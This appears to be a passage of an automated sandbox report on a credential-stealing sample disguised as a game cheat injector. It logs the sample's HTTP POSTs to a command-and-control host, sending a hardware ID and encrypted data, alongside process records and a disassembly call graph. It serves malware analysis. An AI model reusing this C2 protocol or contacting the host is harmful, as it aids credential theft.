                                                              Data Ascii: RwBs}nhJ\=]P)QUkE!+y+-AVDP,[$GuY'U31h#5#Mk yTyVTsMS3'"SZ-KT{-*Ewt|9jDMO`qU|@7i?!X(Cq"t{%,&BMDv}9hBPICgV4^4
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: 99 60 42 f4 1f 7c 87 81 db eb 72 df 5d bc 57 1a d3 7c 31 a3 a9 0d 61 1f d1 43 22 c7 d2 0b 90 de d1 5f db 84 dc 5f 07 99 f3 ea 81 bf 80 21 b1 b4 af c5 d2 2a ad d6 80 17 2c 29 2f bc 7f 84 9b 64 9e 8d f4 c3 6e 88 fc 82 56 2f eb 93 5c 20 66 87 8a 19 2d e1 95 50 93 26 09 ab 78 55 e6 33 31 66 a6 3f 30 14 8b ee fe e6 ea ba d9 57 4a 9e fe 5d 10 6b a8 e3 8d 9b 61 25 7f 0f 0a 95 4d ed 9b ac fb 5a 4e f6 6b 92 11 52 fe f5 ed 4f 16 0e 47 8f 8d 8f db 27 1f e1 93 29 6b 3b 8a e9 6d ec cd e7 66 87 b3 cf 21 e3 01 25 8f 49 81 58 55 80 20 85 cf cc 27 bb ab 0b d5 8e 44 cf 48 a3 94 24 ce 7e 48 0a 39 f8 d7 d5 5c 04 d4 4b d3 1e 15 54 1f a2 e9 12 f4 ea 6d 0e 3a d6 1d c4 c8 1f 3d 8b 33 1b a9 72 8a 53 df ba 8b 91 30 90 73 76 ec d3 02 7b 47 e4 5b 91 a9 df 2a 61 28 38 50 e0 83 13 e0
                                                              Data Ascii: `B|r]W|1aC"__!*,)/dnV/\ f-P&xU31f?0WJ]ka%MZNkROG')k;mf!%IXU 'DH$~H9\KTm:=3rS0sv{G[*a(8P
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: b8 7f 4a b9 b8 45 a9 f9 bc 45 8b 19 a7 4b 1b 93 3a f0 e2 ab 47 ab 8d 15 3d 42 cf 1d 21 36 41 4b 60 1e c7 23 25 4b b2 e7 94 51 b3 d1 bb 61 b3 43 ee 35 05 1a 91 1f 91 3f f5 2f aa aa 56 3d b3 8c 92 d7 7c 13 91 f0 59 ad 4b 59 24 2a 30 42 7f e8 63 8b c0 13 cf c6 7f 56 31 40 da 3a 87 a3 c2 50 11 25 d1 d9 e6 d5 06 0c 13 27 91 17 df 1f 33 f0 fc e3 c0 76 14 bf 8d 7c 77 fd 7a 86 95 e8 1f fe a4 06 d3 18 1d 86 17 0a 8c 0d 5d cb ea ad 1c 45 50 d6 a7 ff 53 7a 52 b0 64 62 bf 83 da e7 1f b2 e0 a8 18 ee ff 9c 64 9f 2a ab 0f 0f 34 85 5d b7 36 14 88 46 ff 23 6e b7 91 f1 2b 3c 32 9c 86 8d cb f2 d2 d0 c3 24 4e e3 c9 34 d6 97 3f 55 4a 0e a5 d5 fc a3 0b 85 23 14 b2 0f 02 f3 59 9e 81 58 ad 2e 1f 7d 89 9b 96 93 bf 7a 5b 0e db 52 a8 ff 7c 44 cf 7b f7 30 2e f9 37 6e b6 16 62 1e fe
                                                              Data Ascii: JEEK:G=B!6AK`#%KQaC5?/V=|YKY$*0BcV1@:P%'3v|wz]EPSzRdbd*4]6F#n+<2$N4?UJ#YX.}z[R|D{0.7nb
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: ce 7c 9b a1 63 46 9a ae 51 c2 45 39 e4 45 fb 48 ef 5a 3e 7b 23 35 3a 48 06 48 2c 8a 0f 89 f3 8e 95 a5 4f a2 60 03 cd 84 ab 26 0f 9b b8 2f 91 c4 c9 97 2a eb 57 e0 48 37 31 92 12 83 a7 ac 14 42 6c 82 56 01 e6 e9 ef f2 62 1c 7f 27 75 6c 60 68 6e 32 02 81 33 1a e8 03 9c b4 7b 92 33 c2 2d f1 94 04 60 eb 5e 8c f2 c3 a3 de 47 e4 1c ee 79 7a 5d 30 15 d6 02 65 48 71 2f f4 36 62 19 78 a0 2f 49 be 83 c9 f1 39 59 d4 2f 56 fa 11 ac ca 61 37 a3 3e 7d 84 84 56 b7 45 f7 1d 73 18 d4 ed bc e3 2f 01 de b5 0d 5b 91 2f 3a c1 83 3e ca b9 66 20 18 bf 46 3b aa d7 e0 27 2c ac ca 34 9a 04 af 34 89 b9 cd 96 b7 8a fb 68 4a d9 b1 df 98 46 1e 81 31 b1 d0 64 23 d3 41 e6 b8 c4 cc eb 05 9b 66 e8 cf 3b 6c 9f 04 ac bc fc cd e0 77 36 4e 78 f7 ce 46 8c 9b c9 d7 d1 c5 d0 c8 3b 7b 7e 3f bd bd
                                                              Data Ascii: |cFQE9EHZ>{#5:HH,O`&/*WH71BlVb'ul`hn23{3-`^Gyz]0eHq/6bx/I9Y/Va7>}VEs/[/:>f F;',44hJF1d#Af;lw6NxF;{~?
                                                              2024-10-26 05:01:21 UTC1016INHTTP/1.1 200 OK
                                                              Date: Sat, 26 Oct 2024 05:01:21 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=po97p09m96pj4nik58rnsq0f03; expires=Tue, 18 Feb 2025 22:48:00 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aVA9TUsEQIbVnlQFJeVMXqysgkXMpRa96lbwGMz%2Bg3GCa%2BuuKl%2FYUBTwFj05OZiTijKV4wqUi0JhBT7WJAvr2SPC2TSU8iAJKynKA6BcddPu6WptrOPo%2BbOBnyrcjmnyrQf1"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8d87e3461cac00a2-CDG
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=147489&sent=204&recv=409&lost=0&retrans=0&sent_bytes=2837&recv_bytes=556029&delivery_rate=19108&cwnd=32&unsent_bytes=0&cid=f5a526fbed99b541&ts=2392&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.449746104.21.95.914432892C:\Users\user\Desktop\CheatInjector.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-26 05:01:22 UTC264OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 89
                                                              Host: crisiwarny.store
                                                              2024-10-26 05:01:22 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 71 67 66 76 71 6d 71 72 69 75 62 78 26 6a 3d 26 68 77 69 64 3d 32 43 44 41 37 43 34 33 35 44 30 43 39 32 31 37 32 38 43 46 44 32 34 36 42 37 34 36 34 36 46 31
                                                              Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--qgfvqmqriubx&j=&hwid=2CDA7C435D0C921728CFD246B74646F1
                                                              2024-10-26 05:01:23 UTC1008INHTTP/1.1 200 OK
                                                              Date: Sat, 26 Oct 2024 05:01:23 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=o4u48pjelduglg0fg81oh7tm7t; expires=Tue, 18 Feb 2025 22:48:01 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bKSaNTkyHB0EBoWofZiicoV2o5R9%2FiWJ%2FGaO2qN9SdXTAnz9CuHlNk2TrazmsoazF13f7QB9VbZIJSxxGUrK2mxA8sk2x8%2F4ZhGdtbnygR7kRVrJgP8xvfg0IFzVImT%2B9YvI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8d87e35a3e68947d-LHR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=104602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=989&delivery_rate=27612&cwnd=32&unsent_bytes=0&cid=2e66b79d964122f8&ts=342&x=0"
                                                              2024-10-26 05:01:23 UTC54INData Raw: 33 30 0d 0a 6d 39 2b 38 59 4d 37 4c 57 76 34 54 62 4c 6e 6d 30 34 58 39 5a 50 67 36 4a 63 33 75 2b 4b 77 57 74 77 65 63 4c 44 61 67 6e 48 6a 41 67 67 3d 3d 0d 0a
                                                              Data Ascii: 30m9+8YM7LWv4TbLnm04X9ZPg6Jc3u+KwWtwecLDagnHjAgg==
                                                              2024-10-26 05:01:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:01:01:06
                                                              Start date:26/10/2024
                                                              Path:C:\Users\user\Desktop\CheatInjector.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\CheatInjector.exe"
                                                              Imagebase:0x4c0000
                                                              File size:539'648 bytes
                                                              MD5 hash:9FB7DA682B76ACBDF560398AA193FF7A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:01:01:06
                                                              Start date:26/10/2024
                                                              Path:C:\Users\user\Desktop\CheatInjector.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\CheatInjector.exe"
                                                              Imagebase:0x4c0000
                                                              File size:539'648 bytes
                                                              MD5 hash:9FB7DA682B76ACBDF560398AA193FF7A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1832867124.0000000001624000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:01:01:07
                                                              Start date:26/10/2024
                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 280
                                                              Imagebase:0xd50000
                                                              File size:483'680 bytes
                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:1.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:4.2%
                                                                Total number of Nodes:544
                                                                Total number of Limit Nodes:13
                                                                execution_graph 39281 4da82c 39286 4da602 39281->39286 39284 4da86b 39287 4da621 39286->39287 39288 4da634 39287->39288 39292 4da649 39287->39292 39306 4d030e 14 API calls __dosmaperr 39288->39306 39290 4da639 39307 4cb6ef 41 API calls _Deallocate 39290->39307 39301 4da769 39292->39301 39308 4e0a9a 41 API calls 2 library calls 39292->39308 39293 4da644 39293->39284 39303 4e1208 39293->39303 39295 4da81a 39312 4cb6ef 41 API calls _Deallocate 39295->39312 39298 4da7b9 39298->39301 39309 4e0a9a 41 API calls 2 library calls 39298->39309 39300 4da7d7 39300->39301 39310 4e0a9a 41 API calls 2 library calls 39300->39310 39301->39293 39311 4d030e 14 API calls __dosmaperr 39301->39311 39313 4e0bd2 39303->39313 39306->39290 39307->39293 39308->39298 39309->39300 39310->39301 39311->39295 39312->39293 39316 4e0bde ___scrt_is_nonwritable_in_current_image 39313->39316 39314 4e0be5 39333 4d030e 14 API calls __dosmaperr 39314->39333 39316->39314 39318 4e0c10 39316->39318 39317 4e0bea 39334 4cb6ef 41 API calls _Deallocate 39317->39334 39324 4e119a 39318->39324 39323 4e0bf4 39323->39284 39336 4dad92 39324->39336 39329 4e11d0 39331 4e0c34 39329->39331 39390 4d54b6 14 API calls __dosmaperr 39329->39390 39335 4e0c67 LeaveCriticalSection __wsopen_s 39331->39335 39333->39317 39334->39323 39335->39323 39391 4d03e3 39336->39391 39339 4dadb6 39341 4d0a98 39339->39341 39403 4d0924 39341->39403 39344 4e1228 39345 4e1245 39344->39345 39346 4e125a 39345->39346 39347 4e1273 39345->39347 39442 4d02fb 14 API calls __dosmaperr 39346->39442 39428 4dc1ba 39347->39428 39351 4e125f 39443 4d030e 14 API calls __dosmaperr 39351->39443 39352 4e1298 39441 4e0ee1 CreateFileW 39352->39441 39353 4e1281 39444 4d02fb 14 API calls __dosmaperr 39353->39444 39357 4e126c 39357->39329 39358 4e1286 39445 4d030e 14 API calls __dosmaperr 39358->39445 39360 4e134e GetFileType 39361 4e1359 GetLastError 39360->39361 39362 4e13a0 39360->39362 39448 4d02b4 14 API calls __dosmaperr 39361->39448 39450 4dc105 15 API calls 2 library calls 39362->39450 39363 4e1323 GetLastError 39447 4d02b4 14 API calls __dosmaperr 39363->39447 39364 4e12d1 39364->39360 39364->39363 39446 4e0ee1 CreateFileW 39364->39446 39368 4e1367 CloseHandle 39368->39351 39371 4e1390 39368->39371 39370 4e1316 39370->39360 39370->39363 39449 4d030e 14 API calls __dosmaperr 39371->39449 39372 4e13c1 39374 4e140d 39372->39374 39451 4e10f0 75 API calls 3 library calls 39372->39451 39379 4e1414 39374->39379 39453 4e0c93 75 API calls 4 library calls 39374->39453 39375 4e1395 39375->39351 39378 4e1442 39378->39379 39380 4e1450 39378->39380 39452 4d6055 44 API calls 2 library calls 39379->39452 39380->39357 39382 4e14cc CloseHandle 39380->39382 39454 4e0ee1 CreateFileW 39382->39454 39384 4e14f7 39385 4e152d 39384->39385 39386 4e1501 GetLastError 39384->39386 39385->39357 39455 4d02b4 14 API calls __dosmaperr 39386->39455 39388 4e150d 39456 4dc2cd 15 API calls 2 library calls 39388->39456 39390->39331 39392 4d0401 39391->39392 39398 4d03fa 39391->39398 39392->39398 39400 4d4200 41 API calls 3 library calls 39392->39400 39394 4d0422 39401 4d8662 41 API calls __Getctype 39394->39401 39396 4d0438 39402 4d86c0 41 API calls __wsopen_s 39396->39402 39398->39339 39399 4d5854 5 API calls std::_Locinfo::_Locinfo_ctor 39398->39399 39399->39339 39400->39394 39401->39396 39402->39398 39404 4d094c 39403->39404 39405 4d0932 39403->39405 39406 4d0953 39404->39406 39407 4d0972 39404->39407 39421 4d0ad9 14 API calls ___free_lconv_mon 39405->39421 39420 4d093c 39406->39420 39422 4d0b1a 15 API calls __wsopen_s 39406->39422 39423 4daaad MultiByteToWideChar 39407->39423 39411 4d0981 39412 4d0988 GetLastError 39411->39412 39414 4d09ae 39411->39414 39426 4d0b1a 15 API calls __wsopen_s 39411->39426 39424 4d02b4 14 API calls __dosmaperr 39412->39424 39414->39420 39427 4daaad MultiByteToWideChar 39414->39427 39416 4d0994 39425 4d030e 14 API calls __dosmaperr 39416->39425 39418 4d09c5 39418->39412 39418->39420 39420->39329 39420->39344 39421->39420 39422->39420 39423->39411 39424->39416 39425->39420 39426->39414 39427->39418 39429 4dc1c6 ___scrt_is_nonwritable_in_current_image 39428->39429 39457 4cf8b0 EnterCriticalSection 39429->39457 39431 4dc1cd 39433 4dc1f2 39431->39433 39437 4dc261 EnterCriticalSection 39431->39437 39438 4dc214 39431->39438 39461 4dbf94 15 API calls 3 library calls 39433->39461 39436 4dc1f7 39436->39438 39462 4dc0e2 EnterCriticalSection 39436->39462 39437->39438 39439 4dc26e LeaveCriticalSection 39437->39439 39458 4dc2c4 39438->39458 39439->39431 39441->39364 39442->39351 39443->39357 39444->39358 39445->39351 39446->39370 39447->39351 39448->39368 39449->39375 39450->39372 39451->39374 39452->39357 39453->39378 39454->39384 39455->39388 39456->39385 39457->39431 39463 4cf8f8 LeaveCriticalSection 39458->39463 39460 4dc234 39460->39352 39460->39353 39461->39436 39462->39438 39463->39460 39464 4c6d04 39465 4c6d10 ___scrt_is_nonwritable_in_current_image 39464->39465 39492 4c6f00 11 API calls ___scrt_uninitialize_crt 39465->39492 39467 4c6d17 39468 4c6e6a 39467->39468 39477 4c6d41 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 39467->39477 39533 4c777f 4 API calls 2 library calls 39468->39533 39470 4c6e71 39534 4d19dc 23 API calls CallUnexpected 39470->39534 39472 4c6e77 39535 4d19a0 23 API calls CallUnexpected 39472->39535 39474 4c6e7f 39475 4c6d60 39476 4c6de1 39493 4c7894 GetStartupInfoW __fread_nolock 39476->39493 39477->39475 39477->39476 39529 4cf80b 41 API calls 3 library calls 39477->39529 39479 4c6de7 39494 4d15e0 51 API calls 39479->39494 39482 4c6def 39495 4c59d6 39482->39495 39486 4c6e03 39486->39470 39487 4c6e07 39486->39487 39488 4c6e10 39487->39488 39531 4d1991 23 API calls CallUnexpected 39487->39531 39532 4c7071 77 API calls ___scrt_uninitialize_crt 39488->39532 39491 4c6e18 39491->39475 39492->39467 39493->39479 39494->39482 39536 4c6b09 39495->39536 39498 4c5a37 39501 4c5a4f 39498->39501 39616 4c3eb0 41 API calls _Deallocate 39498->39616 39500 4c5a16 39615 4c2314 43 API calls 39500->39615 39504 4c5a70 GetPEB 39501->39504 39617 4c31f4 75 API calls 39501->39617 39550 4c2f88 39504->39550 39508 4c5a5a 39508->39504 39618 4c3eb0 41 API calls _Deallocate 39508->39618 39512 4c5a66 std::ios_base::_Ios_base_dtor 39512->39504 39516 4c5ad6 39519 4c5af3 39516->39519 39594 4c10ef 39516->39594 39602 4c1ea3 39516->39602 39609 4c40ed 39519->39609 39522 4c5b65 39620 4c6b4c 39522->39620 39523 4c5b16 39619 4c511c 107 API calls 39523->39619 39525 4c5b1b GetProcessHeap HeapAlloc 39525->39522 39526 4c5b37 wsprintfA GetStdHandle WriteConsoleA GetProcessHeap HeapFree 39525->39526 39526->39522 39528 4c5b82 39530 4c78ca GetModuleHandleW 39528->39530 39529->39476 39530->39486 39531->39488 39532->39491 39533->39470 39534->39472 39535->39474 39538 4c6b0e 39536->39538 39539 4c59fb 39538->39539 39541 4c6b2a 39538->39541 39627 4cf96a 39538->39627 39637 4d0e6d EnterCriticalSection LeaveCriticalSection std::_Facet_Register 39538->39637 39539->39498 39614 4c22bb 43 API calls 2 library calls 39539->39614 39542 4c6b34 39541->39542 39543 4c3e06 Concurrency::cancel_current_task 39541->39543 39542->39542 39636 4c81dc RaiseException 39543->39636 39545 4c3e22 39638 4cb63b 41 API calls 2 library calls 39545->39638 39547 4cb70e 39639 4cb71c 11 API calls CallUnexpected 39547->39639 39549 4cb71b 39551 4c2fbb 39550->39551 39569 4c303d std::ios_base::_Ios_base_dtor 39551->39569 39642 4c1481 39551->39642 39553 4c31d2 39646 4c3e8a 39553->39646 39556 4c6b4c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39557 4c31ed 39556->39557 39570 4c5be2 39557->39570 39558 4c6b09 std::_Facet_Register 43 API calls 39558->39569 39559 4c1481 43 API calls 39559->39569 39560 4c5be2 72 API calls 39560->39569 39561 4c10ef 51 API calls 39561->39569 39564 4c1ea3 75 API calls 39564->39569 39566 4c3e8a 41 API calls 39566->39569 39569->39553 39569->39558 39569->39559 39569->39560 39569->39561 39569->39564 39569->39566 39650 4c2855 75 API calls 3 library calls 39569->39650 39651 4c14ad 43 API calls 4 library calls 39569->39651 39652 4c2ec3 41 API calls 2 library calls 39569->39652 39653 4c4c02 47 API calls std::_Throw_Cpp_error 39569->39653 39654 4c326d 41 API calls _Deallocate 39569->39654 39571 4c5bf4 39570->39571 39657 4c5b91 39571->39657 39574 4c2ee9 39577 4c2f1a 39574->39577 39583 4c2f52 39574->39583 39576 4c6b4c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39578 4c2f66 39576->39578 39580 4c2f6a 39577->39580 39577->39583 39680 4c22bb 43 API calls 2 library calls 39577->39680 39681 4c4c86 75 API calls 2 library calls 39577->39681 39682 4c3eb0 41 API calls _Deallocate 39577->39682 39584 4c2107 39578->39584 39683 4c3eb0 41 API calls _Deallocate 39580->39683 39583->39576 39585 4c2115 39584->39585 39684 4c2191 39585->39684 39589 4c2150 39691 4c4e0a 39589->39691 39591 4c2169 39592 4c2188 39591->39592 39699 4c4022 39591->39699 39592->39516 39595 4c10fb __EH_prolog3_catch _strlen 39594->39595 39972 4c25d7 39595->39972 39597 4c4022 43 API calls 39598 4c1284 39597->39598 39976 4c27d4 39598->39976 39600 4c128c CallUnexpected 39600->39516 39601 4c1154 39601->39597 39603 4c55ea 67 API calls 39602->39603 39604 4c1eb6 39603->39604 39995 4c5032 39604->39995 39606 4c1ec1 39607 4c4a6e 51 API calls 39606->39607 39608 4c1ec8 39607->39608 39608->39516 40003 4c408c 39609->40003 39611 4c40f8 39612 4c411b DeleteFileA VirtualProtect 39611->39612 39613 4c4022 43 API calls 39611->39613 39612->39522 39612->39523 39613->39612 39614->39500 39615->39498 39616->39501 39617->39508 39618->39512 39619->39525 39621 4c6b54 39620->39621 39622 4c6b55 IsProcessorFeaturePresent 39620->39622 39621->39528 39624 4c74b6 39622->39624 40016 4c7479 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39624->40016 39626 4c7599 39626->39528 39628 4d8614 39627->39628 39629 4d8652 39628->39629 39630 4d863d HeapAlloc 39628->39630 39634 4d8626 __Getctype 39628->39634 39641 4d030e 14 API calls __dosmaperr 39629->39641 39632 4d8650 39630->39632 39630->39634 39633 4d8657 39632->39633 39633->39538 39634->39629 39634->39630 39640 4d0e6d EnterCriticalSection LeaveCriticalSection std::_Facet_Register 39634->39640 39636->39545 39637->39538 39638->39547 39639->39549 39640->39634 39641->39633 39643 4c149e 39642->39643 39644 4c148b 39642->39644 39655 4c1575 43 API calls 2 library calls 39643->39655 39644->39551 39647 4c31db 39646->39647 39648 4c3e92 39646->39648 39647->39556 39656 4c1455 41 API calls 2 library calls 39648->39656 39650->39569 39651->39569 39652->39569 39653->39569 39654->39569 39655->39644 39656->39647 39658 4c5ba6 _swprintf 39657->39658 39661 4cf646 39658->39661 39662 4cf65a _swprintf 39661->39662 39663 4cf67c 39662->39663 39665 4cf6a3 39662->39665 39676 4cb672 29 API calls _Deallocate 39663->39676 39677 4ccfcd 72 API calls 2 library calls 39665->39677 39666 4cf697 39670 4cb42b 39666->39670 39671 4cb437 39670->39671 39672 4cb44e 39671->39672 39678 4cb4d6 41 API calls 2 library calls 39671->39678 39674 4c5aac 39672->39674 39679 4cb4d6 41 API calls 2 library calls 39672->39679 39674->39574 39676->39666 39677->39666 39678->39672 39679->39674 39680->39577 39681->39577 39682->39577 39683->39583 39685 4c219e 39684->39685 39706 4c4b48 39685->39706 39688 4c20b0 39769 4c21dd 39688->39769 39690 4c20b9 39690->39589 39692 4c4e18 39691->39692 39698 4c4e4e std::ios_base::_Ios_base_dtor 39691->39698 39775 4c67a2 39692->39775 39696 4c4e37 39784 4c1ecc 67 API calls 4 library calls 39696->39784 39698->39591 39700 4c407d 39699->39700 39702 4c4039 39699->39702 39700->39592 39705 4c4072 39702->39705 39970 4c2551 43 API calls 39702->39970 39703 4c408b 39971 4c81dc RaiseException 39705->39971 39715 4c38d6 39706->39715 39710 4c4b64 39711 4c4b7d 39710->39711 39712 4c4022 43 API calls 39710->39712 39713 4c2131 39711->39713 39726 4c65eb 9 API calls 2 library calls 39711->39726 39712->39711 39713->39688 39716 4c4022 43 API calls 39715->39716 39717 4c390a 39716->39717 39718 4c6b09 std::_Facet_Register 43 API calls 39717->39718 39719 4c3911 39718->39719 39720 4c391f 39719->39720 39727 4c60e2 47 API calls 6 library calls 39719->39727 39722 4c55ea 39720->39722 39723 4c55fe 39722->39723 39728 4c1f45 39723->39728 39725 4c5607 std::ios_base::_Ios_base_dtor 39725->39710 39726->39713 39727->39720 39743 4c5c48 39728->39743 39732 4c1f69 39741 4c1f7c 39732->39741 39762 4c356e 66 API calls 2 library calls 39732->39762 39734 4c1fb2 39734->39725 39736 4c1f8c 39737 4c1fb8 39736->39737 39738 4c1f93 39736->39738 39764 4c3e23 RaiseException CallUnexpected 39737->39764 39763 4c60b0 43 API calls std::_Facet_Register 39738->39763 39755 4c5ca0 39741->39755 39744 4c5c5e 39743->39744 39745 4c5c57 39743->39745 39747 4c1f56 39744->39747 39766 4c680e EnterCriticalSection 39744->39766 39765 4cf90f 6 API calls 2 library calls 39745->39765 39749 4c2b8b 39747->39749 39750 4c2bbb 39749->39750 39751 4c2b97 39749->39751 39750->39732 39752 4c5c48 std::_Lockit::_Lockit 7 API calls 39751->39752 39753 4c2ba1 39752->39753 39754 4c5ca0 std::_Lockit::~_Lockit 2 API calls 39753->39754 39754->39750 39756 4cf91d 39755->39756 39757 4c5caa 39755->39757 39768 4cf8f8 LeaveCriticalSection 39756->39768 39758 4c5cbd 39757->39758 39767 4c681c LeaveCriticalSection 39757->39767 39758->39734 39761 4cf924 39761->39734 39762->39736 39763->39741 39765->39747 39766->39747 39767->39758 39768->39761 39770 4c6b09 std::_Facet_Register 43 API calls 39769->39770 39771 4c2215 39770->39771 39773 4c2223 39771->39773 39774 4c60e2 47 API calls 6 library calls 39771->39774 39773->39690 39774->39773 39776 4c6725 39775->39776 39777 4c4e26 39776->39777 39785 4d03d8 39776->39785 39777->39698 39783 4c374f 41 API calls 39777->39783 39781 4c678c 39781->39777 39803 4cbbec 39781->39803 39783->39696 39784->39698 39786 4d0321 ___scrt_is_nonwritable_in_current_image 39785->39786 39787 4d0334 39786->39787 39790 4d0354 39786->39790 39817 4d030e 14 API calls __dosmaperr 39787->39817 39789 4d0339 39818 4cb6ef 41 API calls _Deallocate 39789->39818 39792 4d0359 39790->39792 39793 4d0366 39790->39793 39819 4d030e 14 API calls __dosmaperr 39792->39819 39809 4d6125 39793->39809 39797 4d0376 39820 4d030e 14 API calls __dosmaperr 39797->39820 39798 4d0383 39821 4d03c1 LeaveCriticalSection __fread_nolock 39798->39821 39801 4c6771 39801->39777 39802 4cc927 68 API calls _swprintf 39801->39802 39802->39781 39804 4cbbff _swprintf 39803->39804 39847 4cbac7 39804->39847 39806 4cbc0b 39807 4cb42b _swprintf 41 API calls 39806->39807 39808 4cbc17 39807->39808 39808->39777 39810 4d6131 ___scrt_is_nonwritable_in_current_image 39809->39810 39822 4cf8b0 EnterCriticalSection 39810->39822 39812 4d613f 39823 4d61c9 39812->39823 39817->39789 39818->39801 39819->39801 39820->39801 39821->39801 39822->39812 39831 4d61ec 39823->39831 39824 4d614c 39837 4d6185 39824->39837 39825 4d6244 39842 4d5459 14 API calls 3 library calls 39825->39842 39827 4d624d 39843 4d54b6 14 API calls __dosmaperr 39827->39843 39830 4d6256 39830->39824 39844 4d5a41 6 API calls __Getctype 39830->39844 39831->39824 39831->39825 39831->39831 39840 4cba9f EnterCriticalSection 39831->39840 39841 4cbab3 LeaveCriticalSection 39831->39841 39834 4d6275 39845 4cba9f EnterCriticalSection 39834->39845 39836 4d6288 39836->39824 39846 4cf8f8 LeaveCriticalSection 39837->39846 39839 4d036f 39839->39797 39839->39798 39840->39831 39841->39831 39842->39827 39843->39830 39844->39834 39845->39836 39846->39839 39848 4cbad3 ___scrt_is_nonwritable_in_current_image 39847->39848 39849 4cbadd 39848->39849 39850 4cbb00 39848->39850 39873 4cb672 29 API calls _Deallocate 39849->39873 39857 4cbaf8 39850->39857 39858 4cba9f EnterCriticalSection 39850->39858 39853 4cbb1e 39859 4cbb5e 39853->39859 39855 4cbb2b 39874 4cbb56 LeaveCriticalSection __fread_nolock 39855->39874 39857->39806 39858->39853 39860 4cbb8e 39859->39860 39861 4cbb6b 39859->39861 39863 4cbb86 39860->39863 39875 4cbe59 39860->39875 39899 4cb672 29 API calls _Deallocate 39861->39899 39863->39855 39869 4cbbba 39892 4d5fb2 39869->39892 39873->39857 39874->39857 39876 4cbe72 39875->39876 39880 4cbba6 39875->39880 39877 4d5efa __fread_nolock 41 API calls 39876->39877 39876->39880 39878 4cbe8e 39877->39878 39901 4d6b8f 39878->39901 39881 4d5cc8 39880->39881 39882 4d5cdf 39881->39882 39884 4cbbae 39881->39884 39882->39884 39943 4d54b6 14 API calls __dosmaperr 39882->39943 39885 4d5efa 39884->39885 39886 4d5f1b 39885->39886 39887 4d5f06 39885->39887 39886->39869 39944 4d030e 14 API calls __dosmaperr 39887->39944 39889 4d5f0b 39945 4cb6ef 41 API calls _Deallocate 39889->39945 39891 4d5f16 39891->39869 39893 4d5fdb 39892->39893 39894 4cbbc1 39892->39894 39895 4d602a 39893->39895 39897 4d6002 39893->39897 39894->39863 39900 4d54b6 14 API calls __dosmaperr 39894->39900 39954 4cb672 29 API calls _Deallocate 39895->39954 39946 4d5f21 39897->39946 39899->39863 39900->39863 39903 4d6b9b 